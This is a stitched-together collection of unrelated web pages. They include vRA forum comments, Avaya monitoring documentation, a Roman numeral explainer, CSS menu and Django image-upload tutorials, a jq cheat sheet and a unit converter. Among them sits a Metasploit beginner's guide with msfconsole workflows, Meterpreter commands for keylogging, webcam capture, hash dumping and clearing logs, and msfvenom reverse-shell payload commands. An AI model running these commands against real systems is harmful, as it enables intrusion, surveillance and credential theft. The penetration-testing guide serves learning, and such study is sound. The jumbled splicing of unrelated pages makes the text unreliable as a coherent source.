+"""Test the support of VLAN Offload Features by Poll Mode Drivers.
+
+The test suite ensures that with the correct configuration, a port
+will not drop a VLAN tagged packet. In order for this to be successful,
+packet header stripping and packet receipts must be enabled on the Poll Mode Driver.
+The test suite checks that when these conditions are met, the packet is received without issue.
+The suite also checks to ensure that when these conditions are not met, as in the cases where
+stripping is disabled, or VLAN packet receipts are disabled, the packet is not received.
+Additionally, it checks the case where VLAN header insertion is enabled in transmitted packets,
+which should be successful if the previous cases pass.
+
+"""
+
+from scapy.layers.l2 import Dot1Q, Ether # type: ignore[import-untyped]
+from scapy.packet import Raw # type: ignore[import-untyped]
+
+from framework.remote_session.testpmd_shell import SimpleForwardingModes, TestPmdShell
+from framework.test_suite import TestSuite
+
+
+class TestVlan(TestSuite):
+ """DPDK VLAN test suite.
+
+ Ensures VLAN packet reception, stripping, and insertion on the Poll Mode Driver
+ when the appropriate conditions are met. The suite contains four test cases:
+
+ 1. VLAN reception no stripping - verifies that a vlan packet with a tag
+ within the filter list is received.
+ 2. VLAN reception stripping - verifies that a vlan packet with a tag
+ within the filter list is received without the vlan tag.
+ 3. VLAN no reception - verifies that a vlan packet with a tag not within
+ the filter list is dropped.
+ 4. VLAN insertion - verifies that a non vlan packet is received with a vlan
+ tag when insertion is enabled.
+ """
+
+ def set_up_suite(self) -> None:
+ """Set up the test suite.
+
+ Setup:
+ Verify that at least two ports are open for session.
+ """
+ self.verify(len(self._port_links) > 1, "Not enough ports")
+
+ def send_vlan_packet_and_verify(self, should_receive: bool, strip: bool, vlan_id: int) -> None:
+ """Generate a vlan packet, send and verify packet with same payload is received on the dut.
+
+ Args:
+ should_receive: Indicate whether the packet should be successfully received.
+ strip: Indicates whether stripping is on or off, and when the vlan tag is
+ checked for a match.
+ vlan_id: Expected vlan ID.
+ """
+ packet = Ether() / Dot1Q(vlan=vlan_id) / Raw(load="xxxxx")
+ received_packets = self.send_packet_and_capture(packet)
+ test_packet = None
+ for packet in received_packets:
+ if b"xxxxx" in packet.load:
+ test_packet = packet
+ break
+ if should_receive:
+ self.verify(
+ test_packet is not None, "Packet was dropped when it should have been received"
+ )
+ if test_packet is not None:
+ if strip:
+ self.verify(
+ not test_packet.haslayer(Dot1Q), "Vlan tag was not stripped successfully"
+ )
+ else:
+ self.verify(
+ test_packet.vlan == vlan_id,
+ "The received tag did not match the expected tag",
+ )
+ else:
+ self.verify(
+ test_packet is None,
+ "Packet was received when it should have been dropped",
+ )
+
+ def send_packet_and_verify_insertion(self, expected_id: int) -> None:
+ """Generate a packet with no vlan tag, send and verify on the dut.
+
+ Args:
+ expected_id: The vlan id that is being inserted through tx_offload configuration.
+ """
+ packet = Ether() / Raw(load="xxxxx")
+ received_packets = self.send_packet_and_capture(packet)
+ test_packet = None
+ for packet in received_packets:
+ if b"xxxxx" in packet.load:
+ test_packet = packet
+ break
+ self.verify(test_packet is not None, "Packet was dropped when it should have been received")
+ if test_packet is not None:
+ self.verify(test_packet.haslayer(Dot1Q), "The received packet did not have a vlan tag")
+ self.verify(
+ test_packet.vlan == expected_id, "The received tag did not match the expected tag"
+ )
+
+ def vlan_setup(self, port_id: int, filtered_id: int) -> TestPmdShell:
+ """Setup method for all test cases.
+
+ Args:
+ shell: TestPmdShell object that is being used inside test case.
+ port_id: Number of port to use for setup.
+ filtered_id: ID to be added to the vlan filter list.
+ """
+ testpmd = TestPmdShell(node=self.sut_node)
+ testpmd.set_forward_mode(SimpleForwardingModes.mac)
+ testpmd.set_promisc(port_id, False)
+ testpmd.vlan_filter_set(port=port_id, on=True)
+ testpmd.rx_vlan(vlan=filtered_id, port=port_id, add=True)
+ return testpmd
+
+ def test_vlan_receipt_no_stripping(self) -> None:
+ """Ensure vlan packet is dropped when receipts are enabled and header stripping is disabled.
+
+ Test:
+ Create an interactive testpmd shell and verify a vlan packet.
+ """
+ testpmd = self.vlan_setup(port_id=0, filtered_id=1)
+ testpmd.start()
+
+ self.send_vlan_packet_and_verify(True, strip=False, vlan_id=1)
+ testpmd.close()
+
+ def test_vlan_receipt_stripping(self) -> None:
+ """Ensure vlan packet received with no tag when receipts and header stripping are enabled.
+
+ Test:
+ Create an interactive testpmd shell and verify a vlan packet.
+ """
+ testpmd = self.vlan_setup(port_id=0, filtered_id=1)
+ testpmd.vlan_strip_set(port=0, on=True)
+ testpmd.start()
+
+ self.send_vlan_packet_and_verify(should_receive=True, strip=True, vlan_id=1)
+ testpmd.close()
+
+ def test_vlan_no_receipt(self) -> None:
+ """Ensure vlan packet dropped when filter is on and sent tag not in the filter list.
+
+ Test:
+ Create an interactive testpmd shell and verify a vlan packet.
+ """
+ testpmd = self.vlan_setup(port_id=0, filtered_id=1)
+ testpmd.start()
+
+ self.send_vlan_packet_and_verify(should_receive=False, strip=False, vlan_id=2)
+ testpmd.close()
+
+ def test_vlan_header_insertion(self) -> None:
+ """Ensure that vlan packet is received with the correct inserted vlan tag.
+
+ Test:
+ Create an interactive testpmd shell and verify a non-vlan packet.
+ """
+ testpmd = TestPmdShell(node=self.sut_node)
+ testpmd.set_forward_mode(SimpleForwardingModes.mac)
+ testpmd.set_promisc(port=0, on=False)
+ testpmd.port_stop_all()
+ testpmd.tx_vlan_set(port=1, vlan=51)
+ testpmd.port_start_all()
+ testpmd.start()
+
+ self.send_packet_and_verify_insertion(expected_id=51)
+ testpmd.close()
|
__label__pos
| 0.713666 |
Answers
Solutions by everydaycalculation.com
Answers.everydaycalculation.com » LCM of two numbers
What is the LCM of 72 and 3430?
The lcm of 72 and 3430 is 123480.
Steps to find LCM
1. Find the prime factorization of 72
72 = 2 × 2 × 2 × 3 × 3
2. Find the prime factorization of 3430
3430 = 2 × 5 × 7 × 7 × 7
3. Multiply each factor the greater number of times it occurs in steps i) or ii) above to find the lcm:
LCM = 2 × 2 × 2 × 3 × 3 × 5 × 7 × 7 × 7
4. LCM = 123480
MathStep (Works offline)
Download our mobile app and learn how to find LCM of upto four numbers in your own time:
Android and iPhone/ iPad
Find least common multiple (lcm) of:
LCM Calculator
Enter two numbers separate by comma. To find lcm of more than two numbers, click here.
© everydaycalculation.com
|
__label__pos
| 0.999804 |
This documentation is archived and is not being maintained.
FtpWebResponse Methods
(see also Protected Methods )
Name Description
Public method Close Overridden. Frees the resources held by the response.
Public method CreateObjRef Creates an object that contains all the relevant information required to generate a proxy used to communicate with a remote object. (Inherited from MarshalByRefObject.)
Public method Equals Overloaded. Determines whether two Object instances are equal. (Inherited from Object.)
Public method GetHashCode Serves as a hash function for a particular type. GetHashCode is suitable for use in hashing algorithms and data structures like a hash table. (Inherited from Object.)
Public method GetLifetimeService Retrieves the current lifetime service object that controls the lifetime policy for this instance. (Inherited from MarshalByRefObject.)
Public method GetResponseStream Overridden. Retrieves the stream that contains response data sent from an FTP server.
Public method GetType Gets the Type of the current instance. (Inherited from Object.)
Public method InitializeLifetimeService Obtains a lifetime service object to control the lifetime policy for this instance. (Inherited from MarshalByRefObject.)
Public method Static ReferenceEquals Determines whether the specified Object instances are the same instance. (Inherited from Object.)
Public method ToString Returns a String that represents the current Object. (Inherited from Object.)
Top
Name Description
Protected method Finalize Allows an Object to attempt to free resources and perform other cleanup operations before the Object is reclaimed by garbage collection. (Inherited from Object.)
Protected method GetObjectData Populates a SerializationInfo with the data that is needed to serialize the target object. (Inherited from WebResponse.)
Protected method MemberwiseClone Overloaded. (Inherited from MarshalByRefObject.)
Top
Show:
|
__label__pos
| 0.898798 |
How Do I Reverse A String?
How do you reverse a string in Java?
How to reverse String in Javapublic class StringFormatter {public static String reverseString(String str){StringBuilder sb=new StringBuilder(str);sb.reverse();return sb.toString();}}.
Which function is used to reverse the string?
strrevThe strrev() function is used to reverse the given string. Syntax: char *strrev(char *str);
How do you reverse a string without reverse function?
Example to reverse string in Java by using static methodimport java.util.Scanner;public class ReverseStringExample3.{public static void main(String[] arg){ReverseStringExample3 rev=new ReverseStringExample3();Scanner sc=new Scanner(System.in);System.out.print(“Enter a string : “);More items…
Can you Scanf a string in C?
You can use the scanf() function to read a string. The scanf() function reads the sequence of characters until it encounters whitespace (space, newline, tab, etc.).
How do you reverse a string?
Method 1: Reverse a string by swapping the charactersInput the string from the user.Find the length of the string. The actual length of the string is one less than the number of characters in the string. … Repeat the below steps from i = 0 to the entire length of the string.rev[i] = str[j]Print the reversed string.Mar 11, 2020
How can I reverse a string without TEMP variable?
Algorithm to Reverse String Without Temporary VariableStore start index in low and end index in high.Here, without creating a temp variable to swap characters, we use xor(^).Traverse the input string “s”.Swap from first variable to end using xor. … Return the final output string.
How do you reverse a string in a for loop?
Reverse The String Using FOR Loop in C//Reverse the String using FOR Loop.#include #include int main(void){char *str=”ForgetCode”;printf(“Reverse the String:”);for(int i=(strlen(str)-1);i>=0;i–){ printf(“%c”,str[i]);More items…
Can we convert StringBuffer to string?
The toString() method of StringBuffer class can be used to convert StringBuffer content to a String. This method returns a String object that represents the contents of StringBuffer. As you can observe that the string object represents the same sequence that we had in StringBuffer.
Can we convert StringBuilder to string in Java?
To convert a StringBuilder to String value simple invoke the toString() method on it. Instantiate the StringBuilder class. Append data to it using the append() method. Convert the StringBuilder to string using the toString() method.
What does reverse () do in Python?
reverse() is an inbuilt method in Python programming language that reverses objects of list in place. Returns: The reverse() method does not return any value but reverse the given object from the list.
How do you read a string?
A string is an array of characters. It is terminated by the null character (‘\0’)….Read string in C using scanf() with %s.Read string in C using scanf() with %c.Read string in C using scanset conversion code ( […] )Read string in C using scanset with [^\n] (single line)Multiline input using scanset.
Can you reverse a string in Python?
There is no built-in function to reverse a String in Python. … The fastest (and easiest?) way is to use a slice that steps backwards, -1 .
How do you reverse a string in C?
Reverse a string in C using strrevint main() { char s[100];printf(“Enter a string to reverse\n”); gets(s);strrev(s);printf(“Reverse of the string: %s\n”, s);return 0; }
How can I reverse a string in C++ without function?
C, C++ Program to Reverse a String without using Strrev FunctionInitialize a variable.Take a input from user.Count the length of a input string, As we are not using any in-built function.Swap the position of an element.
How do I reverse a string using reverse in C++?
How do you reverse a string?Using the built-in reverse function. C++ has an in-built reverse function, that can be called to reverse a string. … Using a loop. Within the main body of the function, a loop can be written to reverse a string. … Using a function. … Creating a new string.
What is reverse string?
Reverse a String using String Builder / String Buffer Class. StringBuffer and StringBuilder comprise of an inbuilt method reverse() which is used to reverse the characters in the StringBuffer. This method replaces the character sequence in the reverse order.
How do you reverse a number?
Where reverse is a variable representing the reverse of number.Step 1 — Isolate the last digit in number. lastDigit = number % 10. … Step 2 — Append lastDigit to reverse. reverse = (reverse * 10) + lastDigit. … Step 3-Remove last digit from number. number = number / 10. … Iterate this process. while (number > 0)Nov 1, 2016
How do I reverse a string in STL?
Let’s see the simple example to reverse the given string:#include #include #include using namespace std;int main() {string str = “Hello Myself Nikita”;cout << "Before Reverse : "<< str << endl;reverse(str. begin(), str. end());More items...
Why the string is immutable?
The string is Immutable in Java because String objects are cached in the String pool. … Mutable String would produce two different hashcodes at the time of insertion and retrieval if contents of String was modified after insertion, potentially losing the value object in the map.
How do you reverse a case in python?
The string swapcase() method converts all uppercase characters to lowercase and vice versa of the given string, and returns it. Here string_name is the string whose cases are to be swapped.
How do you reverse a string without reverse method in Python?
First of all, let’s take a string and store it in a variable my_string.my_string=(“Nitesh Jhawar”) my_string=(“Nitesh Jhawar”) my_string=(“Nitesh Jhawar”) … str=”” str=”” str=”” … for i in my_string: for i in my_string: for i in my_string: … str=i+str. str=i+str. str=i+str.
|
__label__pos
| 1 |
VMware vRealize Automation – vRA7 – Custom Hostnaming Extension for vRA7 and beyond
Caution: Articles written for technical not grammatical accuracy, If poor grammar offends you proceed with caution ;-)
THIS EXTENSION IS NO LONGER MAINTAINED
I want to thank all of you that have downloaded and used this module. We never expected it to be as widely used as it has been. We decided to stop maintaining this because it was originally built as an example of how one could achieve this capability. Much to our surprise it has been deployed into countless production environments. As a result we have received countless requests for support which we cannot provide.
Their is good news however. Their is a commercially available supported product that is capable to doing much more than this module is capable of. For more information See article on SovLabs Hostname Module
Overview
One of the most frequent asks when using vRA is, “How do I deploy machines using my company’s hostnaming standards automatically using vRA?” Since the out-of-the box hostnaming only provides a way to do prefix-suffix, the answer to this question usually is that it will require customization.
This solution is intended to provide a way to implement this functionality by using a small, highly versatile custom extension which can handle 95% of use cases without writing custom code.
The rest of this article contains instructions on installing and configuring the vRA Custom Hostnaming Extension. This extension allows administrators to model very specific custom hostnaming schemes for their vRA virtual machines, Deployments, and vCloud Director vApps using vRA custom properties, with dynamic creation of stock machine prefixes and index tracking for each unique hostname combination.
This extension is proof-of-concept or demo grade. While it runs well and consistently, it has not been put through a formal quality assurance process, so please use with caution.
See article on SovLabs Hostname Module
Changelog
v4.0
• Upgraded for vRA 7.0 (no longer supports vRA 6.x)
• Property names simplified
v3.1-
For support for vRA 6.x and below, go to:
http://dailyhypervisor.com/vcloud-automation-center-vcac-5-2-custom-hostnaming-extension/
Installation
These installation instructions assume the following:
• You have a working vRealize Orchestrator in your environment.
• You have a working knowledge of administering vRO.
• The vRealize Automation plugin for vRO has been installed, and both a vRA catalog and IaaS host has been added.
• You have the vRealize Orchestrator instance configured as an endpoint in vRealize Orchestrator in the Infrastructure configuration.
• vRA 7+ is preconfigured with at least one working Blueprint with at least one machine component.
Follow the steps below to perform the installation:
1. Download com.dailyhypervisor.vra.customhostname.package from the link above and copy it onto the local file system where you will run the vRealize Orchestrator client.
2. Import com.dailyhypervisor.vra.customhostname.package into your vRO instance.
3. Run the workflow Daily Hypervisor > vRealize Automation > Custom Hostname > Install custom hostname extension.
4. Choose the vRA catalog and IaaS host where you’d like to install the extension and click Submit.
Configuration
To configure vRA to use the custom hostnaming extension, perform the following steps:
image
1. Go to Administration > Property Dictionary > Property Groups.
2. Find the Custom Hostname Properties Template, with its name preceded by a date stamp.
3. Click Copy to create your own Property Group containing the correct properties for custom hostnaming.
image
4. On the Create Property Group page, change the name to reflect this configuration.
5. [Optional] Change the description to reflect this configuration.
6. You will now have all of the custom hostnaming extension properties in your Property Group. Edit the properties list to reflect your desired configuration using the property explanations and/or example below.
Extensibility.Lifecycle.Properties.VMPSMasterWorkflow32.Requested
This property is defined in order to tell vRA’s Event Broker which of the machine’s custom properties to send to the custom hostnaming workflow. The default value of “*” tells EB to send all of the machine’s properties. This is required. DO NOT CHANGE OR REMOVE THIS PROPERTY.Custom.SetCustomHostname.Execute
The existence of this property triggers the custom hostnaming workflow to run. This must be specified to leverage the extension’s functionality.
Note: The value is set to “true” by default. DO NOT CHANGE THIS. It requires an exact match, including case, in order to trigger the workflow.Custom.ComponentMachine.HostnameScheme
This property’s value represents the hostnaming scheme you are using for a component or single machine. The format of this scheme looks something like this: {part1}{part2}{##}. The parts enclosed in curly brackets represent the names of a custom properties whose values you’d like to plug in to those slots. The {##} indicates that you would like a two digit auto-incrementing index placed in that slot. Anything not in curly brackets is placed in the hostname as-is.Custom.Deployment.HostnameScheme [not working yet]*
This property is identical to the one above, except that this scheme gets applied to a Deployment or vCloud Director vApp instead of a component or single machine.Custom.ComponentMachine.NoIndexOnFirst
Adding this property and setting the value to “true” causes the workflow not to add the index to the hostname on the first instance of each unique name.Custom.Deployment.NoIndexOnFirst [not working yet]*
This property is identical to the one above, except that it applies to a Deployment or vCloud Director vApp instead of a component or single machine.Custom.Hostname.OwnerShortNameIdentifier
If this property is specified, it indicates to the custom hostnaming workflow that this value is the identifier of the part of the hostname scheme where the short username (no domain and backslash) of the owner should be placed. For instance, if you specified this property with a value of USR, any part of the hostname scheme where {USR} is specified will be replaced with the owner’s short username.
7. Click OK to save the Property Group.
8. Set the properties you will use as parts to the hostname scheme in the appropriate locations.
9. Add the Property Group you configured to the appropriate location.
Examples
Let’s configure an example custom hostname scheme to get a working understanding of the functionality. We will build a single machine hostname scheme.
1. The first step is to create a Property Group for the configuration.
2. Since we are configuring for a single machine, delete the Custom.Deployment.HostnameScheme and Custom.Deployment.NoIndexOnFirst properties altogether.
3. Also, let’s exclude the owner short username and index removal functionality for this example, so delete Custom.Hostname.OwnerShortNameIdentifier and Custom.ComponentMachine.NoIndexOnFirst.
4. Edit the Custom.ComponentMachine.HostnameScheme property value to model the following use case:
• This scheme has four parts: a location identifier, a group identifier, an application identifier, and an auto-incrementing index, respectively.
• Use LOC for location, GRP for group, and APP for application.
Your hostname scheme should look like this: {LOC}{GRP}{APP}{###}. You will end up with a new Property Group as shown below.
image
5. Now we need to configure the custom properties for each variable identifier in the scheme. Location ties most closely to the Endpoint, Compute Resource, or Reservation, so let’s take advantage of the custom property hierarchy and specify it on the Endpoint.imageI set LOC (our location identifier) to ACY to represent Atlantic City.
6. Group will be specified at the Business Group level, so in my Development Business Group, I created a property named GRP with the value DEV.image
7. The APP identifier’s value will be unique to the machine. So I went to my CentOS 6.6 x64 Blueprint, selected my vSphere Machine on the Design Canvas, and created a property named APP, with a value of LNX for Linux.image
8. Also, be sure to select the Property Group we created in order to tie the hostname scheme properties to machine builds from this Blueprint. Of course, you can specify this anywhere in the property hierarchy that supports Property Groups.imageBy putting three # symbols in for the index, we are indicating that it will be three digits. Since it will be the first time using this hostname combination, the extension should dynamically create a new Machine Prefix, and the index should start at 001 and increment from there.
9. So, if I request a CentOS Linux 6.6 x64 on the vCenter Endpoint in Atlantic City as a member of the Development group, my end result should be…
ACYDEVLNX001
A test reveals that the custom hostnaming extension does its job.
image
Custom Deployment and vCloud Director vApp Naming [not working]*
Custom Deployment and vApp naming works in an almost identical way. However, there are two differences to note.
1. It uses a different hostname scheme property. Instead of Custom.ComponentMachine.HostnameScheme as in our previous example, the workflow looks for Custom.Deployment.HostnameScheme. The reason for this is to allow component machines to have different naming schemes than their parent. Component machines inherit properties from the parent Deployment or vApp, and when the same property is specified on both levels, the parent property overrides that of the component machine. Therefore, without separate properties, component machines would be forced to implement the same hostnaming scheme as the parent Deployment or vApp.
2. Deployments do not inherit all of the same properties as component machines. Namely, they do not inherit properties from placement entities, such as Endpoints, Compute Resources, and Reservations. This is because Deployments themselves do not reside anywhere or consume resources. They are simply a logical grouping of actual machines. The component machines are the ones that are actually placed on infrastructure, and it’s possible to configure a Deployment with component machines that can or will end up on different resources, even in different locations. So it becomes impossible to logically tie Deployments to singular infrastructure. vApps, on the other hand, do support locations, as vCloud Director and vRA both consider them as located in the organization vDC, along with their component virtual machines. In other words, if you were to use the value of Custom.ComponentMachine.HostnameScheme in our previous example as the value of Custom.Deployment.HostnameScheme in a Deployment, you would get an error, because it will not find a property named LOC.
Adding the Owner’s Short Username to a Custom Hostnaming Scheme
One additional function you can use that we did not explore in our example is adding an owner’s short username (without the domain and backslash) as a part of the hostname.
To do this, you can simply specify one additional property, Custom.Hostname.OwnerShortNameIdentifier. Set the value of this property to the identifier you will use in your hostname scheme to specify where to place the username.
Here’s an example of a Property Group created for this scenario:
image
If I logged in as [email protected] and requested a machine from a Blueprint with this scheme enabled, I could expect the machine to be named like this:
image
* Not currently working due to product regression and/or lack of documentation
23 Replies to “VMware vRealize Automation – vRA7 – Custom Hostnaming Extension for vRA7 and beyond”
1. Wanted to install your Workflow but always getting mistakes:
[2016-04-18 10:04:06.218] [I] {“type”:”and”,”subClauses”:[{“type”:”expression”,”operator”:{“type”:”equals”},”leftOperand”:{“type”:”path”,”path”:”data~lifecycleState~state”},”rightOperand”:{“type”:”constant”,”value”:{“type”:”string”,”value”:”VMPSMasterWorkflow32.Requested”}}},{“type”:”expression”,”operator”:{“type”:”equals”},”leftOperand”:{“type”:”path”,”path”:”data~lifecycleState~phase”},”rightOperand”:{“type”:”constant”,”value”:{“type”:”string”,”value”:”POST”}}},{“type”:”expression”,”operator”:{“type”:”equals”},”leftOperand”:{“type”:”path”,”path”:”data~machine~properties~Custom.SetCustomHostname.Execute”},”rightOperand”:{“type”:”constant”,”value”:{“type”:”string”,”value”:”true”}}}]}
[2016-04-18 10:04:07.137] [E] Error in (Workflow:Install state change workflow extension / Prepare params (item1)#67) 403 Forbidden
[2016-04-18 10:04:07.190] [E] Workfow execution stack:
***
item: ‘Install state change workflow extension/item1’, state: ‘failed’, business state: ‘null’, exception: ‘403 Forbidden (Workflow:Install state change workflow extension / Prepare params (item1)#67)’
workflow: ‘Install custom hostname extension’ (d86f3b49-db74-45d0-9c08-9bf6d2e8e3c9)
| ‘attribute’: name=workflowDescription type=string value=Runs a vRO workflow for custom hostnaming
| ‘attribute’: name=vCACMachineState type=string value=Requested
| ‘attribute’: name=vCACWorkflowPriority type=number value=1.0
| ‘attribute’: name=vCACWorkflowTiming type=string value=Post
| ‘attribute’: name=vCACWorkflowTriggerProperty type=string value=Custom.SetCustomHostname.Execute
| ‘attribute’: name=propertySetDetails type=Array/CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails value=#{#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.SetCustomHostname.Execute#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string##+#name#=#string#Custom.Deployment.HostnameScheme#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string##+#name#=#string#Custom.ComponentMachine.HostnameScheme#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#USR#+#name#=#string#Custom.Hostname.OwnerShortNameIdentifier#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.Deployment.NoIndexOnFirst#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.ComponentMachine.NoIndexOnFirst#]##}#
| ‘attribute’: name=propertySetName type=string value=Custom Hostname Properties Template
| ‘attribute’: name=propertySetDescription type=string value=Properties for Custom Hostnaming Extension v4
| ‘attribute’: name=setCustomHostnameWorkflow type=Workflow value=dunes://service.dunes.ch/Workflow?id=’5febfe67-9247-4f72-a072-59c1ce5c2ec1’&dunesName=’Workflow’
| ‘attribute’: name=environmentConfigElement type=ConfigurationElement value=dunes://service.dunes.ch/ConfigurationElement?id=’86e55a3e-73f6-428b-b21f-a69ac280281c’&dunesName=’ConfigurationElement’
| ‘attribute’: name=vCACHostAttributeName type=string value=vraIaasHost
| ‘attribute’: name=vcoWorkflowAsync type=boolean value=false
| ‘attribute’: name=workflowTimeout type=number value=60.0
| ‘attribute’: name=workflowSubscriptionVersion type=string value=0.0.1
| ‘attribute’: name=vcacCafeHostAttributeName type=string value=vraHost
| ‘input’: name=vraCatalogHost type=vCACCAFE:VCACHost value=dunes://service.dunes.ch/CustomSDKObject?id=’1553d476-520d-4cb9-9f6b-86022db0ec96’&dunesName=’vCACCAFE:VCACHost’
| ‘input’: name=vraIaasHost type=vCAC:VCACHost value=dunes://service.dunes.ch/CustomSDKObject?id=’181f6d42-304c-4b2e-9cb2-fe7c3af287ba’&dunesName=’vCAC:VCACHost’
| ‘no outputs’
–workflow: ‘Install state change workflow extension’ (7d047254-e1a4-46d4-8071-57c3dda3fec5)
| ‘attribute’: name=vroWorkflowName type=string value=
| ‘attribute’: name=blocking type=boolean value=true
| ‘attribute’: name=status type=string value=
| ‘attribute’: name=workflowCriteria type=string value=
| ‘attribute’: name=eventTopic type=vCACCAFE:EventTopic value=__NULL__
| ‘attribute’: name=propertySetDetailsWithEbProperty type=Array/CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails value=__NULL__
| ‘attribute’: name=propertyGroupNameWithTimestamp type=string value=
| ‘input’: name=vCOWorkflow type=Workflow value=dunes://service.dunes.ch/Workflow?id=’5febfe67-9247-4f72-a072-59c1ce5c2ec1’&dunesName=’Workflow’
| ‘input’: name=workflowDescription type=string value=Runs a vRO workflow for custom hostnaming
| ‘input’: name=vCACMachineState type=string value=Requested
| ‘input’: name=vCACWorkflowPriority type=number value=1.0
| ‘input’: name=vCACWorkflowTiming type=string value=Post
| ‘input’: name=vCACWorkflowTriggerProperty type=string value=Custom.SetCustomHostname.Execute
| ‘input’: name=propertySetDetails type=Array/CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails value=#{#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.SetCustomHostname.Execute#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string##+#name#=#string#Custom.Deployment.HostnameScheme#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string##+#name#=#string#Custom.ComponentMachine.HostnameScheme#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#USR#+#name#=#string#Custom.Hostname.OwnerShortNameIdentifier#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.Deployment.NoIndexOnFirst#]##;#CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails##[#promptUser#=#boolean#false#+#encrypted#=#boolean#false#+#defaultValue#=#string#true#+#name#=#string#Custom.ComponentMachine.NoIndexOnFirst#]##}#
| ‘input’: name=propertySetName type=string value=Custom Hostname Properties Template
| ‘input’: name=propertySetDescription type=string value=Properties for Custom Hostnaming Extension v4
| ‘input’: name=vcoWorkflowAsync type=boolean value=false
| ‘input’: name=workflowTimeout type=number value=60.0
| ‘input’: name=vraCatalogHost type=vCACCAFE:VCACHost value=dunes://service.dunes.ch/CustomSDKObject?id=’1553d476-520d-4cb9-9f6b-86022db0ec96’&dunesName=’vCACCAFE:VCACHost’
| ‘input’: name=workflowSubscriptionVersion type=string value=0.0.1
| ‘no outputs’
*** End of execution stack.
Do you know what I’m doing wrong?!
By the way is it possible to install your AD Computer Management Workflows in vRealize 7??
Greetz
Susie
1. Hi Susie, We’ve used the Custom Host Naming module from SovLabs that they support as new vRA versions are released. They also have modules in their vRO plug-in framework for AD security groups and OUs, Infoblox, Bluecat, Puppet, Chef, ServiceNow, Netscaler, F5, and Cisco ASA. More at http://www.sovlabs.com
2. Thanks Tom. We’ve used the Custom Host Naming module from SovLabs that they support as new vRA versions are released. They also have modules in their vRO plug-in framework for Infoblox, Bluecat, Puppet, Chef, ServiceNow, AD security groups and OUs, Netscaler, F5, and Cisco ASA. More at http://www.sovlabs.com
3. Hello, First I tried the “Install custom hostname extension” WF but same error above. Below is “Create Property Group” WF log. Is there any fixed version or are we missing something while running the WFs. Thanks
2016-05-08 02:51:41.741+0300 : ERROR : Error in (Workflow:Create property group / Create Property Group (item14)#54) Data serialization error.
2016-05-08 02:51:41.792+0300 : ERROR : Workfow execution stack:
***
item: ‘Create property group/item14’, state: ‘failed’, business state: ‘null’, exception: ‘Data serialization error. (Workflow:Create property group / Create Property Group (item14)#54)’
workflow: ‘Create property group’ (0b8de383-dbc4-4af8-8259-33c1671cd995)
| ‘input’: name=propertyGroupDetails type=Array/CompositeType(name:string,defaultValue:string,encrypted:boolean,promptUser:boolean):PropertyDetails value=null
| ‘input’: name=propertyGroupName type=string value=
| ‘input’: name=propertyGroupDescription type=string value=
| ‘input’: name=vraCatalogHost type=vCACCAFE:VCACHost value=dunes://service.dunes.ch/CustomSDKObject?id=’1b22c263-11f7-46e1-a248-0ff7beccf7a5’&dunesName=’vCACCAFE:VCACHost’
| ‘no outputs’
| ‘no attributes’
*** End of execution stack.
1. What workflow did you run to install the package? You should be running the “Install Custom Hostname” workflow. Not the one under the install folder. Please confirm you are running the appropriate install workflow. When you run it you will need to select the proper Catalog (vRA Appliance) and IaaS (Windows Server) hosts. Please ensure you are choosing the proper host as well.
1. Running that same error here…
Running correct Workflow… version 7.0.1
[2016-05-17 17:33:38.797] [E] Error in (Workflow:Create property group / Create Property Group (item14)#54) 403 Forbidden
[2016-05-17 17:33:38.826] [E] Workfow execution stack:
***
item: ‘Create property group/item14’, state: ‘failed’, business state: ‘null’, exception: ‘403 Forbidden (Workflow:Create property group / Create Property Group (item14)#54)’
workflow: ‘Install custom hostname’ (
1. It looks like the account use to create the vRA endpoint for the tenant in vRO doesn’t have the necessary permissions in vRA. Check the account permission and the vRA endpoint in vRO. It should be specific to the tenant that you are working with.
4. Found the fix to my environment…. when registering the vRA host in vRO under vRealize Automation, do not use the “Add a vRA host using component registry” instead use the “Add a vRA host” workflow. Then when you register the plugin it works fine.
5. Trying to install the extention and get an error at this point:
Run the workflow Daily Hypervisor > vRealize Automation > Custom Hostname > Install custom hostname extension.
vRO pops up and says “Validation process report 4 errors in the workflow. Disable validation checking in the preferences or correct the errors”.
I’m not sure what its angry about.
6. Installed the modules and everything works great except the numbering scheme. I am using three digits so {###} and it gets picked up fine, but the first machine name is always missing any numbers after the name and the second machine always goes to 002 rather than 001. Has anyone else seen this?
